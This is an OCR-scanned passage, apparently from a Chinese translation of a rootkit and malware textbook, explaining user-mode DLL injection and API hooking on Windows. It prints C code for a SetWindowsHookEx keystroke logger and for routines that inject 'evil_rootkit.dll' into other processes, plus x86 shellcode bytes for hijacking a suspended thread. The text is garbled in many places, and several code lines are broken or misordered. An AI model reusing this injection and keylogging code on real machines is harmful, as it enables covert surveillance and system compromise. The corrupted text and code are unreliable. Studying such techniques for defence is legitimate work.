入 或 者 其 他 使 该 进程 执行 Rootkit 代 码 的 存根 (stub) 代码 。 如 果 Rootkit 创 作者 不 能 得 到 进程 中 执行 的 代码 ， 他 的 代码 就 不 能 挂 
钩 进 程 中 的 函数 调用 。 


那么 DLL 注入 进程 是 怎样 工作 的 ”在 进程 中 注入 新 代码 有 3 种 主要 途径 : Windows 钩 子 、 使 用 带 LoadLibrary () 的 
CreateRemoteThread 和 CreateRemoteThread 的 变种 。 


Windows 钧 子 


在 Windows 操 作 系统 中 ， 具 备 图 形 界面 的 应 用 程序 的 大 部 分 通信 使 用 消息 来 进行 。 一 个 编译 用 于 接收 消息 的 应 用 程序 将 创 
建 一 个 消息 队列 ， 当 操作 系统 发 出 新 消息 时 ， 应 用 程序 从 这 个 队列 中 读 取 新 消息 。 例 如 ， 在 Windows 应 用 程序 中 ， 当 你 用 鼠标 
左 键 单 击 OK 按 钮 时 ， 就 向 应 用 程序 的 消息 队列 发 送 一 个 WM_LBUTTONDOWN 消 息 。 然 后 应 用 程序 将 读 取 该 消息 ， 执 行 一 系列 
操作 来 响应 这 一 消息 ， 接 着 等 待 下 一 个 消息 。 控 制 台 应 用 程序 (也 就 是 没有 标准 Windows 用 户 界 面 的 程序 ) 也 可 以 注册 ， 以 接 
收 Windows 消 息 ， 但 是 传统 的 控制 台 应 用 程序 不 处 理 Windows 消 息 。 


消息 通信 在 Windows 应 用 程序 中 很 重要 ， 因 为 Microsoft 已 经 创建 了 一 种 方法 ， 对 特定 用 户 运 行 的 所 有 应 用 程序 消息 进行 拦 
E (或 称 挂钩 ) 。 尽 管 这 是 Microsoft 所 支持 的 接口 并 且 有 很 多 合法 的 用 途 ， 但 是 也 有 很 多 有 疑问 的 用 法 。 传 统 上 ， 这 些 有 疑问 
的 用 法 包括 间谍 软件 和 恶意 软件 中 的 击 刍 记录 程序 和 数据 记录 程序 。 因 为 Microsoft 支 持 这 种 方法 ， 所 以 有 很 多 可 用 的 文档 。 实 
际 上 ， 在 MSDN 中 第 一 篇 关于 消息 钩子 的 文章 写 于 1993 年 ! 因为 这 种 方法 得 到 支持 ， 所 以 它 非 常 有 效 、 简 单 ， 更 重要 的 是 ， 非 


常 可 靠 。 


但 是 ， 这 种 方法 也 有 局 限 性 。 不 处 理 Windows 消 息 的 传统 控制 台 应 用 程序 不 能 通过 这 种 方法 挂 钓 。 而 且 ， 前 面 已 经 提 到 
过 ， 使 用 这 种 方法 安装 的 Windows 钩 子 只 能 与 运行 在 安装 钩子 的 用 户 上 下 文 运行 的 进程 挂钩 。 这 种 局 限 性 看 上 去 可 能 是 个 顽 


疾 ， 但 是 通常 不 是 很 大 的 问题 ， 因 为 一 个 用 户 所 运行 的 几乎 所 有 应 用 程序 都 在 该 用 户 的 上 下 文中 运行 ， 这 些 程序 包括 Internet 
Explorer 和 Windows Explorer， 因 而 不 受 这 种 局 限 性 的 影响 。 


我 们 已 经 提 到 ， 这 种 方法 有 很 多 文档 ， 所 以 我 们 将 只 提供 其 工作 原理 的 简单 回顾 。 本 质 上 ， 开 发 人 员 必 须 创建 一 个 具有 接收 
Windows 消 息 的 函数 的 DLL。 接 着 这 个 函数 调用 SetWindowsHookEx () 函数 通过 操作 系统 注册 。 


我 们 来 看 一 些 代 码 。 我 们 有 一 个 名 为 Hook.dll 的 DLL， 输 出 一 个 函数 调用 HookProcFunc。 这 个 函数 处 理 所 有 被 拦截 的 
Windows 消 息 ， 在 我 们 的 钩子 安装 应 用 程序 中 ， 创 建 如 下 代码 : 


bool InstallHook () 


{ 


HookProc HookProcFunc; 


if (HookProcFunc = (HookProc) ::GetProcAddress (g_ hHookD11,"HookProc") ) 
{ 


if (g_hHook = SetWindowsHookEx(WH_CBT, HookProcFunc, g hHookD11, 0)) 
return true; 


} 


return false; 


注意 ， 我 们 没有 包含 装 入 DLL 的 代码 ， 这 将 由 调用 LoadLibrary () 来 完成 。 现 在 HookProc 已 经 安装 ， 操 作 系 统 自动 将 
Hook.dll 注 入 到 该 用 户 执行 的 每 个 进程 中 ， 并 且 确 保 Windows 消 息 在 被 实际 应 用 程序 (Winternet Explorer) 接收 之 前 ， 传 递 
给 HookProcFunc () 。HookProcFunc 相 当 简 单 : 


LRESULT CALLBACK HookProcFunc (UINT message, WPARAM wParam, LPARAM lParam) 


{ 


if (message == HCBT KEYSKIPPED && (lParam & 0x40000000)) { 
if ((wParam==VK_SPACE) | | (wParam==VK RETURN) | | 
(wParam==VK_TAB) | | (wParam>=0x2f ) &&(wParam<=0x100)) { 


if (wParam==VK RETURN || wParam==VK TAB) { 


WriteKeyStroke('\n') ; 


} else { 
BYTE keyStateArr [256] ; 
WORD word; 
UINT scanCode = lParam; 
char ch; 


GetKeyboardState (keyStateArr) ; 
ToAscii(wParam, scanCode, keyStateArr, &word, 0); 
ch = (char) word; 


if ((GetKeyState(VK_SHIFT) & 0x8000) && 
wParam >= 'a!' && wParam = 'z') 
ch += 'A'-'a'; 


WriteKeyStroke (ch) ; 


} 
} 


return CallNextHookEx( 0, message, wParam, lParam); 


XAT RASA ANB BESAHCBT KEYSKIPPED, INÄ RENREN ASE FI PRIA AK, AS 
当 键 盘 上 按 下 一 个 键 时 就 会 收 到 这 个 消息 。 接 下 来 ， 钧 子 函 数 进行 检查 ， 确 保 按 下 的 键 为 有 效 键 ， 如 果 按 下 的 是 Enter 键 ， 在 日 
志文 件 中 输入 一 个 换行 符 ， 否 则 ， 写 入 键盘 对 应 的 字符 。 


虽然 这 是 个 非常 简单 的 实例 ， 但 是 它 确 实 是 编写 基于 Windows 钩 子 的 击 键 记录 程序 所 需要 的 所 有 内 容 。 使 用 这 种 方法 ， 你 
也 可 以 在 每 次 接收 到 Windows 消 息 时 捕捉 桌面 的 屏幕 截图 ， 甚 至 打开 录音 。 某 些 间谍 软件 和 恶意 软件 以 捕捉 屏幕 而 闻名 ， 它 们 
捕捉 的 不 仅 是 挂钩 的 应 用 程序 ， 还 包括 屏幕 上 的 任何 其 他 内 容 。 


这 种 方法 的 最 大 缺点 是 容易 被 发 现 ， 你 也 可 以 找到 一 些 代 码 样 例 ， 避 免 你 的 应 用 程序 成 为 这 种 方法 的 受害 者 。 


大 部 分 的 Windows 钩 子 实现 中 还 有 另 一 个 问题 : 钩子 似乎 从 来 都 不 曾 “ 有 效 ” 过。 因为 操作 系统 负责 确保 钩子 放置 到 进程 
中 ， 所 以 必须 保护 操作 系统 的 可 靠 性 ， 确 保 钩子 安装 时 操作 系统 不 会 崩溃。 因此 ， 钩 子 在 进程 的 队列 中 接收 到 一 个 新 的 消息 时 安 
装 。 如 果 在 调用 Unhook WindowsHookEx () 函数 (这 个 函数 去 掉 消 息 队列 的 钩子 ) 之 前 没有 接收 到 消息 ，Rootkit 钩 子 将 不 
会 被 安装 。 这 种 情况 发 生 的 次 数 超出 你 的 想象 ， 特 别 是 在 Rootkit 所 要 挂钩 的 进程 、 目 标 进程 的 执行 期 间 以 及 钩子 的 实现 非常 特 
殊 的 时 候 。 为 了 避免 这 种 问题 的 发 生 ， 设 置 钩子 的 应 用 程序 也 应 该 发 送 一 个 “测试 消息 ”给 钩子 ， 以 确保 DLL 和 钩子 正确 地 安装 
到 进程 中 。 


使 用 带 LoadLibrary () 的 CreateRemoteThread 


提 到 DLL 注入 ， 在 各 种 Windows 操 作 系 统 的 进程 中 注入 DLL 有 两 种 常见 的 方法 。 第 一 种 是 使 用 函数 CreateRemoteThread， 
这 个 函数 在 指定 进程 中 启动 一 个 新 线程 。 一 旦 这 个 线程 装 入 该 进程 ， 就 会 执行 Rootkit 创 作者 提供 的 一 个 特殊 DLL 的 代码 。 这 种 
技术 很 简单 ， 已 经 出 现 了 很 多 年 。 除 了 我 们 在 这 里 提 到 的 细节 之 外 ， 在 Web 上 有 几 干 个 实例 ， 包 括 一 些 提 供 源 代码 的 稳定 的 多 
子 引 擎 ， 所 以 只 要 上 Google 就 可 以 得 到 CreateRemoteThread 钩 子 的 良 方 。 如 果 网 上 的 例子 不 管 
FA, MSDN (http://msdn.microsoft.com) 中 发 布 了 线程 函数 的 详细 资料 。 


CreateRemoteThread () 的 参数 包含 注入 的 DLL 名 称 ， 在 这 个 例子 中 是 evil_rootkit.dll。 为 了 解析 这 些 输入 项 ， 这 段 代 码 


在 线程 于 远程 进程 中 启动 时 (在 GetProcAddress () 的 帮助 下 ) 执行 LoadLibrary () 函数 。 因 为 这 段 代码 将 在 独立 的 地 址 空 
间 中 执行 ， 所 以 我 们 必须 修改 字符 串 引 用 ， 这 通过 使 用 VirtualAllocEx () 函数 并 将 该 字符 串 写 入 新 的 可 用 地 址 空间 中 来 完成 。 
通过 将 指针 传递 给 Remotestring () ， 这 段 代 码 可 以 装 入 ， 我 们 可 以 关闭 句柄 。 


#define DLL NAME "evil rootkit.dql1" 
BOOL InjectDLL(DWORD ProcessID) 
{ 

HANDLE Proc; 

char buf [50]={0}; 

LPVOID RemoteString, LoadLibAddy; 


if (!ProcessID) 
return FALSE; 


Proc = OpenProcess (CREATE THREAD ACCESS, FALSE, ProcessID) ; 


if (!Proc) 
sprintf (buf, "OpenProcess() failed: %d", GetLastError()) ; 
MessageBox(NULL, buf, "InjectDLL", NULL); 
return FALSE; 


} 


LoadLibAddy = (LPVOID) GetProcAddress (GetModuleHandle ("kernel32.d11"), 
"LoadLibraryA") ; 
RemoteString = (LPVOID) VirtualAllocEx(Proc, NULL, strlen (DLL NAME), 


MEM_RESERVE|MEM_COMMIT, PAGE READWRITE) ; 
WriteProcessMemory (Proc, (LPVOID)RemoteString, DLL NAME, strlen (DLL_NAME), NULL); 
CreateRemoteThread (Proc, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddy, 
(LPVOID) RemoteString, NULL, NULL); 


CloseHandle (Proc) ; 


return true; 


这 段 代码 将 在 DpenProcess () 打开 的 目标 进程 中 创建 一 个 新 线程 ， 接 着 这 个 线程 将 调用 LoadLibrary () 并 且 将 我 们 的 
evil_rootkit.dll 插 入 进程 中 。 一 旦 装 入 这 个 DLL， 线 程 将 会 退出 ， 该 线程 的 空间 中 现在 有 了 evil_rootkit.dll 的 映射 。 


在 你 尝试 从 一 个 64 位 进程 中 将 一 个 DLL 注 入 32 位 进程 时 这 种 注入 技术 将 会 无 效 ， 反 之 亦 然 ， 这 是 64 位 内 核 的 Windows-on- 
Windows (WoW64) 的 问题 。 具 体 地 说 ，64 位 进程 要 求 64 位 的 指针 ， 因 此 我 们 传递 给 CreateRemoteThread () 的 用 于 
LoadLibrary () 的 指针 必须 是 64 位 指针 。 因 为 我 们 的 注入 应 用 程序 是 32 位 的 ， 不 能 指定 一 个 64 位 指针 。 这 个 问题 如 何 解决 ”要 
有 两 个 注入 应 用 程序 个 用 于 32 位 ， 另 一 个 用 于 64 位 。 





使 用 带 WriteProcessMemory () 的 CreateRemoteThread 


将 一 个 DLL 注入 到 进程 中 的 第 二 种 方法 更 加 隐蔽 一 些 。CreateRemoteThread () 可 以 执行 你 的 代码 来 代替 操作 系统 调用 
LoadLibrary () 。 你 实际 使 用 的 是 WriteProcessMemory () ， 这 是 我 们 在 前 一 个 进程 中 写 入 DLL 名 称 所 使 用 的 函数 ， 现 在 我 
们 用 它 来 将 整个 国 数 集 写 入 进程 的 内 存 空间 ， 然 后 用 CreateRemoteThread () 调用 刚刚 写 入 进程 内 存 的 函数 。 


这 种 方法 有 许多 不 足 ， 我 们 将 逐个 解决 。 首 先 来 看 看 我 们 的 进程 (这 个 进程 包含 了 我 们 希望 在 目标 进程 中 包含 的 实例 代码 ) 
在 内 存 中 的 样子 ， 再 看 看 我 们 将 自己 的 数据 通过 WriteProcessMemory () 写 入 到 目标 进程 时 目标 进程 在 内 存 中 的 样子 。 本 小 
节 的 代码 是 由 本 书 的 作者 编写 的 。 


正如 你 在 图 3-1 中 所 看 到 的 ， 我 们 必须 将 自己 的 函数 数据 复制 到 目标 进程 。 而 且 ， 任 何 数据 (如 配置 参数 、 选 项 等 ) 都 必须 
复制 到 目标 进程 ， 因 为 NewFunc 复 制 到 目标 进程 之 后 就 无 法 访问 任何 注入 进程 的 数据 。 你 应 该 为 目标 进程 中 的 NewFunc 复 制 什 
么 类 型 的 数据 ”使 用 这 种 方法 的 问题 之 一 是 你 复制 到 目标 进程 的 代码 不 能 引用 除了 kernel32.dll、ntdll.dl 和 user32.dll 之 外 的 任 
何 外 部 PDLL， 因 为 只 有 前 述 的 3 个 DLL 能 够 保证 映射 到 每 个 进程 的 相同 地 址 。user32.dll 不 能 保证 映射 到 相同 的 地 址 ， 但 是 通常 可 
以 做 到 。Microsoft 开 发 人 员 选 择 始终 分 配 相同 地 址 的 原因 是 有 争论 的 ， 但 是 许多 人 认为 这 是 与 性 能 或 者 向 后 兼容 性 相关 的 。 因 
此 ， 如 果 你 想 要 访问 在 目标 进程 中 不 可 用 的 DLL 国 数 ， 必 须 向 你 所 希望 使 用 的 函数 (如 LoadLibrary () 和 
GetProcAddress () ) 传递 一 个 指针 。 而 且 ， 因 为 静态 字符 串 存储 在 二 进 制 文件 的 数据 段 ， 任 何在 NewFunc 中 使 用 的 静态 字 
符 串 将 不 会 被 复制 到 目标 进程 中 ， 所 以 ， 所 有 字符 串 应 该 通过 使 用 WriteProcess-Memory () 复制 到 目标 进程 来 传递 给 
NewFunc。 因 为 需要 复制 的 数据 很 多 ， 建 议 创 建 一 个 包含 所 需要 传递 的 结构 ， 这 样 能 够 简单 地 引用 所 有 数据 ， 而 不 必 频 繁 地 计 
算 偏 移 量 ， 并 且 保 存 你 复制 数据 的 位 置 的 内 存 地 址 。 下 面 是 一 个 名 为 HOOKDATA 的 结构 : 


我 们 的 注入 进程 目标 进程 


图 3-1 ”将 数据 注入 到 新 的 挂钩 进程 的 结构 





typedef HINSTANCE (WINAPI *FPLOADLIBRARY) (LPCTSTR) ; 
typedef FARPROC (WINAPI *FPGETPROCADDRESS) (HMODULE, LPCSTR) ; 
typedef struct { 

FPLOADLIBRARY fnLoadLibrary; 

FPGETPROCADDRESS fnGetProcAddress; 

char lpszDLLName [128] ; // buffer for name of DLL to load 
} HOOKDATA; 


定义 了 所 需要 传递 的 数据 和 希望 注入 的 函数 之 后 ， 必 须 复 制 NewFunc， 这 是 目标 进程 中 启动 线程 时 将 要 执行 的 函数 。 为 了 
将 数据 从 一 个 位 置 复制 到 另 一 个 位 置 ， 必 须知 道 数据 的 大 小 。 可 以 手工 地 反 汇 编 代 码 或 者 使 用 下 列 hack 程 序 来 确定 NewFunc 的 


大 小 : 


static DWORD WINAPI NewFunc (HOOKDATA *pHookData) 
{ 
// call LoadLibrary.. 
return pHookData->fnLoadLibrary (pData->lpszDLLName) ; 


} 


static void AfterNewFunc (void) 


{ 
} 





AfterNewFunc 函 数 在 编译 时 一 般 将 被 直接 放 在 NewFunc 代 码 之 后 ， 你 可 以 利用 编译 器 以 简单 的 计算 返回 NewFunc 的 大 


小 : 
DWORD dwCodeSize = (PCHAR)AfterNewFunc - (PCHAR)NewEunc ; 


现在 你 已 经 知道 了 代码 的 大 小 ， 就 可 以 将 其 复制 到 目标 进程 并 且 创建 你 的 线程 了 ! 


BOOL InjectDLL(DWORD ProcessID) 
{ 

HANDLE Proc; 

char buf [50]={0}; 

HOOKDATA *pHookData; 

BYTE *pNewFunc; 

DWORD dwCodeSize = 0; 


if (!ProcessID) 
return FALSE; 


Prog = OpenProcess (CREATE THREAD ACCESS, FALSE, ProcessID) ; 


if (! Proc) 

{ 
sprintf (buf, "OpenProcess() failed: %d", GetLastError() ) ; 
MessageBox(NULL, buf, "InjectDLL", NULL) ; 
return FALSE; 


} 


pHookData = (HOOKDATA *)VirtualAllocEx(Proc, NULL, sizeof (HOOKDATA) , 
MEM RESERVE|MEM COMMIT, PAGE READWRITE) ; 
pHookData->fnLoadLibrary = (LPVOID)GetProcAddress (GetModuleHandle ("kernel132. 
dll"), 
"LoadLibraryA"); 


WriteProcessMemory (Proc, (LPVOID)pHookData->lpszDLLName, DLL_NAME, 
strlen (DLL_NAME), NULL); 


pNewFunc = (BYTE *)VirtualAllocEx (Proc, NULL, dwCodeSize), 
MEM_RESERVE |MEM_COMMIT, PAGE_READWRITE) ; 
dwCodeSize = (PCHAR)AfterNewFunc - (PCHAR)NewFunc; 


WriteProcessMemory (Proc, (LPVOID)NewFunc, NewFunc, dwCodeSize, NULL); 

CreateRemoteThread (Proc, NULL, NULL, (LPTHREAD START ROUTINE) pNewFunc, 
(LPVOID) pHookData, NULL, NULL) ; 

CloseHandle (Proc); 

return true; 


现在 ， 这 段 代 码 在 新 的 进程 中 执行 ， 执 行 一 个 能 够 装 入 你 的 下 恶 的 DLL 或 者 执行 本 章 稍 后 谈 到 的 其 他 挂钩 活动 的 函数 。 


对 非 系统 进程 的 高 级 DLL 注入 


在 rootkit.com 中 xshadow 所 写 的 一 篇 名 为 “Executing Arbitrary Code in a Chosen Process (or Advanced DLL 
Injection) ” (在 选择 的 进程 中 执行 任意 代码 (高 级 DLL 注入 ) ) 的 文章 中 ， 提 到 了 另 一 种 在 别 的 进程 中 执行 代码 的 技术 。 
xshadow 的 研究 和 实现 有 益 于 Vangquish Rootkit 中 的 注入 技术 的 更 新 。 完 整 的 文章 和 代码 样 例 可 以 
在 https://www.Rootkit.com/newsread.php?newsid=53 上 找到 。 这 个 进程 类 似 于 刚刚 描述 过 的 方法 ， 唯 一 的 例外 是 : 这 种 方 
法 不 在 目标 进程 中 创建 一 个 新 的 线程 ， 而 是 劫持 一 个 现 有 的 线程 并 使 其 执行 代码 ， 然 后 返回 该 线程 正在 进行 的 工作 。 


这 种 方法 的 工作 原理 如 下 : 

1) 监控 新 进程 的 创建 。 

2) 当 新 的 进程 创建 时 ， 查 找 第 一 个 线程 的 句柄 。 

3) 调用 线程 句柄 的 SuspendThread () 函数 ， 这 个 函数 暂停 线程 的 执行 。 


4) 将 线程 的 前 几 条 汇编 指令 (这 是 进程 希望 执行 的 常规 代码 ) 修改 为 执行 代码 并 且 将 DLL 装 入 进程 任意 内 人 存 空 间 的 
LoadLibrary 调 用 。 


步骤 4 是 最 困难 的 操作 ， 因 为 开发 人 员 必 须知 道 进程 的 执行 方式 以 及 CPU 中 的 各 种 寄存 器 的 工作 方式 。 我 们 来 简单 地 讲述 一 
下 关于 汇编 的 知识 ， 以 描述 步骤 4 的 实现 。 


在 x86 体 系 结构 中 ， 有 一 组 CPU 存储 区 域 (寄存 器 ) 用 于 快速 地 处 理 指令 。 表 3-2 列 出 了 使 用 汇编 代码 进行 工作 和 进行 系统 
操作 时 需要 知道 和 理解 的 重要 寄存 器 。 


步骤 4 按照 下 列 的 顺序 执行 这 个 DLL 注入 。 首 先 ， 我 们 使 用 GetThreadContext () 读 取 线程 的 上 下 文 标志 。 这 些 信息 包含 
表 3-2 中 描述 的 处 理 器 寄存 器 的 信息 。 


表 3-2 ”最 常用 的 x86CPU 寄 存 器 


寄存 希 Ha id 

eax D WE ARR Ay AN 
ebx 扩展 基本 寄存 着 
ecx D IRATI Ar 
edx D ERR HE AF AN 
esi P RIL 5 | AAT A 
edi P R HERR | AATA 
ebp P RIEA $8 Et ATAR 
esp H eRe ta FT 

eip 扩展 指令 指针 

flags 标志 


下 一 步 是 将 代码 复制 到 进程 内 存 空间 中 任意 的 一 个 地 址 。 我 们 在 CreateRemoteThread/WriteProcessMemory 的 例子 中 做 
过 这 个 工作 ， 方 法 是 寻找 我 们 的 函数 的 地 址 ， 并 且 将 其 复制 到 目标 进程 ， 在 这 里 我 们 也 同样 这 么 做 ， 但 是 有 一 点 要 特别 注意 。 当 
我 们 的 代码 被 调用 时 ， 必 须 确保 所 有 表 3-2 中 描述 的 寄存 器 具有 和 代码 执行 前 相同 的 值 ， 这 样 被 劫持 的 线程 才能 继续 正常 执行 。 
有 一 个 很 好 的 汇编 指令 pushad， 以 及 相对 应 的 指令 popad， 这 两 个 指令 会 将 所 有 寄存 器 的 一 份 拷贝 压 入 内 人 存 ， 以 及 在 以 后 将 这 
份 拷贝 返回 给 寄存 器 。 在 函数 的 开始 和 结束 只 要 调用 pushad 和 popad 就 可 以 处 理 所 有 的 问题 ， 所 以 我 们 所 必须 关注 的 只 是 在 函 
数 中 执行 LoadLibrary () 调用 。 


现在 我 们 在 目标 进程 中 有 了 代码 ， 必 须 调整 进程 的 上 下 文 (包括 下 一 个 执行 的 指令 ) 以 执行 我 们 的 代码 。 


我 们 提 到 过 必须 读 取 进程 的 上 下 文 ， 这 可 以 通过 调用 GetThreadContext () 来 完成 。 这 个 国 数 返回 由 所 有 进程 上 下 文 填 充 
而 成 的 一 个 结构 ， 包 括 各 种 寄存 器 的 值 。 看 看 从 MSDN 免 费 下 载 的 Windows SDK 中 包含 的 winnt.h 头 文件 ， 可 以 找到 这 个 结构 
的 完整 细节 ， 这 超出 了 本 书 的 范围 。 


CONTEXT ctx; 
GetThreadContext (hThread, &ctx) ; 


现在 我 们 已 经 有 了 线程 的 上 下 文 ， 可 以 用 代码 来 调整 上 下 文 的 值 。 首 先 ， 我 们 必须 定义 执行 pushad/popad 和 
LoadLibrary () 调用 的 函数 。 最 简单 的 方法 是 使 用 汇编 ， 代 码 如 下 : 


pushad 

push O0xAAAAAAAA ; Argument for LoadLibraryA, e.g, our DLL NAME 
mov esi, OxBBBBBBBB ; Address of LoadLibraryA 

call esi 

popad 

ret 


注意 两 个 具有 占 位 符 值 的 内 存 地 址 (0xAAAAAAAA 和 0xBBBBBBBB) ， 它 们 必须 由 注入 函数 中 定义 的 真实 值 代替。 
注意 : 分 号 之 后 的 任何 内 容 都 是 注释 而 不 是 汇编 语句 。 


因为 所 有 汇编 指令 也 可 以 用 十 六 进 制 数 定 义 ， 我 们 必须 将 这 个 汇编 程序 转换 为 一 系列 十 入 进 制 字 符 并 且 蔡 换 占 位 地 址 值 。 一 
有 旦 这 些 值 以 十 六 进 制 表示 ， 我 们 就 可 以 将 其 转换 为 ASCll 表 示 ， 例 如 可 以 放 入 源 代 码 中 的 可 打印 字符 。 在 我 们 将 汇编 程序 转换 为 
十 六 进 制 并 且 在 变量 pbData 中 存储 数据 之 后 ， 就 有 了 如 下 的 数据 : 


EVIL ROOTKIT.DLL // do not forget the null 
0x60 //pushad 

0x68 Oxaa Oxaa Oxaa Oxaa //push dword 

Oxbe Oxbb Oxbb Oxbb Oxbb //mov esi, dword 
Oxff Oxd6 //call esi 

0x61 //popad 

Oxc3 //ret 


我 们 还 在 十 六 进 制 代码 的 开始 处 包含 了 文本 字符 串 EVIL_ROOTKIT.DLL， 这 只 是 为 了 在 目标 进程 中 仅 进行 一 次 内 存 分 配 ， 而 
不 是 两 次 (一 次 用 于 字符 串 ， 一 次 用 于 遂 数 代码 ) 。 在 我 们 用 这 段 代 码 进行 任何 工作 之 前 ， 应 该 得 到 LoadLibrary () 的 地 址 并 
且 用 这 个 地 址 替换 pbData 中 的 0xXBBBBBBBB 地 址 。 


现在 我 们 有 了 这 些 数据 (pbData) ,必须 为 之 在 目标 进程 中 分 配 内 存 并 且 将 数据 复制 到 进程 内 存 中 : 


pCodeBase = (BYTE *)VirtualAllocEx(Proc, NULL, dwNumBytes, 
MEM RESERVE|MEM COMMIT, PAGE READWRITE); 
WriteProcessMemory (Proc, (LPVOID)pCodeBase, pbData, dwCodeSize, NULL); 


pCodeBase 现 在 包含 了 一 个 指向 目标 进程 中 内 存 的 指针 ， 还 包含 了 DLL 名 称 和 汇编 代码 的 一 个 副本 。 我 们 现在 只 要 用 必须 
传递 给 LoadLibrary () 的 DLL 名 称 的 正确 地 址 最 后 一 次 更 新 代码 就 可 以 了 。 重 新 调用 LoadLibrary 需 要 一 个 带 有 存在 于 目标 进程 
中 而 且 可 以 访问 的 地 址 的 参数 ， 这 就 是 我 们 将 其 作为 复制 到 目标 进程 的 代码 的 一 部 分 的 原因 。 因 为 我 们 将 DLL 名 称 放 在 复制 代码 
的 开始 ， 所 以 知道 该 字符 串 的 起 点 ， 可 以 用 pCodeBase 的 地 址 替换 0xAAAAAAAA 值 。 最 后 ， 我 们 必须 告诉 进程 从 代码 的 起 点 开 
始 执行 ， 这 个 起 点 紧 接 在 DLL 名 称 之 后 : 


ctx.Eip = (DWORD)pCodeBase + sizeof ("EVIL ROOTKIT.DLL") ; 
ctx.Esp -= 4; // We must decrement esp so eip will be executed 


然后 ， 我 们 设置 线程 上 下 文 并 且 蔡 换 现 有 上 下 文 ， 使 线程 启动 并 且 执 行 代码 : 


SetThreadContext (hThread, &ctx) ; 
ResumeThread (hThread) ; 


这 就 是 高 级 DLL 注入 技术 的 一 个 简单 说 明 ， 但 是 要 使 这 种 技术 有 效 还 需要 其 他 的 支持 代码 。Web 上 有 可 用 的 代码 样 例 ， 在 
Vanquish 中 有 实用 的 代码 实现 。 


这 种 技术 非常 详尽 且 具 有 技巧 性 , 但是， 除了 Vanquish Rootkit 以 外 并 没有 太 多 的 应 用 。 大 部 分 恶意 软件 和 Rootkit 采 用 第 
一 种 或 者 第 二 种 DLL 注入 方法 。 最 后 这 种 方法 在 64 位 环境 下 也 不 能 工作 ， 除 非 重 写 为 使 用 64 位 偏 移 量 。 而 且 ， 这 种 技术 对 于 托管 
代码 (如 .NET) 也 无 效 ， 因 为 .NET 在 线程 被 挂 起 之 前 会 接管 线程 。 


3.24 ”钩子 技术 


尽管 挂钩 进程 有 多 种 方法 和 技术 ， 但 我 们 将 讨论 两 种 与 Rootkit 技 术 相 关 的 。 第 一 种 是 输入 地 址 表 钩 子 (Import Address 
Table hooking) ， 第 二 种 是 家 入 水 数 钧 子 (inline function hooking) 。 


输入 地 址 表 钩 子 


这 种 技术 相当 简单 并 且 广 泛 地 用 于 政 恶 和 良性 的 编程 。 当 一 个 可 执行 文件 装 入 时 ，Windows 读 取 文 件 中 的 可 移植 执行 体 
(PE) 结构 ， 并 且 将 可 执行 文件 装 入 到 内 存 。PE 格 式 是 修改 过 的 Unix 文 件 格 式 ， 是 Windows 中 所 有 EXE、DLL、SYS 和 OBJ 文 件 
的 格式 ， 对 Windows 体 系 结构 非常 关键 。 执 行文 件 将 会 列 出 所 需要 的 来 自 每 个 DLL 的 所 有 遂 数 。 因 为 进程 是 动态 的 ， 这 些 变 量 
需要 在 运行 时 之 前 装 入 用 于 访问 。Windows 装 入 程序 能 够 制作 一 张 所 有 函数 指针 的 表格 ， 称 为 输入 地 址 表 (Import Address 
Table, IAT) 。 通 过 创建 这 个 IAT， 可 执行 程序 能 够 在 每 次 调用 API 时 进行 一 个 跳 转 ， 识 别 所 需 程序 库 的 存储 位 置 。 这 种 技术 使 
运行 时 性 能 很 高 ， 但 是 执行 程序 的 首次 装 入 可 能 会 较 慢 。 


现在 一 个 Rootkit DLL 必须 做 的 就 是 修改 IAT 中 特定 函数 的 地 址 ， 这 样 当 应 用 程序 调用 特定 函数 时 ， 就 会 调用 Rootkit 的 六 
嵌入 函数 钩子 


第 二 种 钩子 技术 被 称 为 嵌入 函数 钩子 。 这 种 技术 用 Rootkit 指 令 来 蔡 换 目标 函数 的 头 5 个 字 节 ， 从 而 修改 核心 系统 DLL。 通 过 
创建 一 个 指向 Rootkit 的 跳 转 ， 钩 子 函数 能 够 控制 函数 并 且 修改 返回 的 数据 。 


钩子 引擎 


因为 用 户 模式 钩子 已 经 相当 多 ， 许 多 供应 商 将 钩子 用 于 合法 的 目的 ， 比 如 授权 、 数 据 保护 甚至 简单 的 应 用 程序 功能 。 因 为 这 
些 需 求 ， 已 经 开发 出 了 多 种 钩子 引擎 ， 帮 助 开发 人 员 制 作用 户 模式 钩子 。 这 些 引 擎 也 可 以 为 Rootkit 创 作者 所 用 ， 但 是 我 们 还 没 
有 发 现 太 多 这 种 情况 。EasyHook 可 能 是 最 完整 和 稳定 的 钧 子 引 擎 ， 具 有 许多 超出 简单 用 户 模式 钩子 引 警 的 功能 。 下 面 是 
EasyHook 作 者 对 这 个 引擎 的 描述 : 


EasyHook 起 源 于 Microsoft Detours， 支 持 从 完全 托管 环境 ， 例 如 使 用 Windows2000SP4 及 更 新 版 本 (包括 Windows 


XP x64, Windows Vista x64#qWindows Server2008x64) 的 C#， 使 用 纯粹 的 托管 代码 来 扩展 (FERS) 非 托 管 代 码 (API) 。 
它 也 能 支持 32 位 和 64 位 内 核 模 式 钧 子 和 非 托 管用 户 模式 AP1， 这 使 你 可 以 在 不 需要 客户 PC 上 有 NET Framework 的 情况 下 挂钩 目 
标 进 程 。 一 种 试验 性 的 隐身 注入 能 使 钩子 避 开 大 部 分 当今 的 防 病毒 软件 。 


关于 EasyHook 很 重要 的 一 点 是 ， 它 的 创作 者 非常 擅长 于 确保 钩子 功能 对 于 注入 和 删除 钩子 都 很 稳定 。 


EasyHook 有 很 多 特性 。 下 面 是 一 个 能 够 帮助 你 为 自己 的 钩子 项 目 决 定 选 择 EasyHook 的 摘要 。 而 且 ， 碍 看 EasyHook 的 源 代 
B ( 它 是 个 开源 软件 ) ， 你 可 以 看 到 很 好 应 用 前 述 的 钧 子 技术 的 代码 实例 。 


所谓 的 线程 死 锁 屏 障 (Thread Deadlock Barrier) 能 消除 许多 挂钩 未 知 API 时 的 核心 问题 。 
“ 你 可 以 为 非 托 管 的 API 编 写 托管 钩子 句柄 ， 例 如 ， 用 C# 编 写 钩 子 ! 


你 可 以 使 用 所 有 方便 的 托管 代码 提供 程序 ， 如 .NET Remoting, Windows Presentation Foundation (WPF) 和 Windows 


Communication Foundation (WCF) 。 
“ 这 是 个 具有 文档 的 、 快 速 和 可 移植 的 纯 非 托 管 钩子 API。 
+ 提供 32 位 和 64 位 内 核 模式 钩子 的 支持 ， 包 括 绕 过 PatchGuard1 
- 在 钩子 进程 中 没有 资源 和 内 存 泄漏 。 
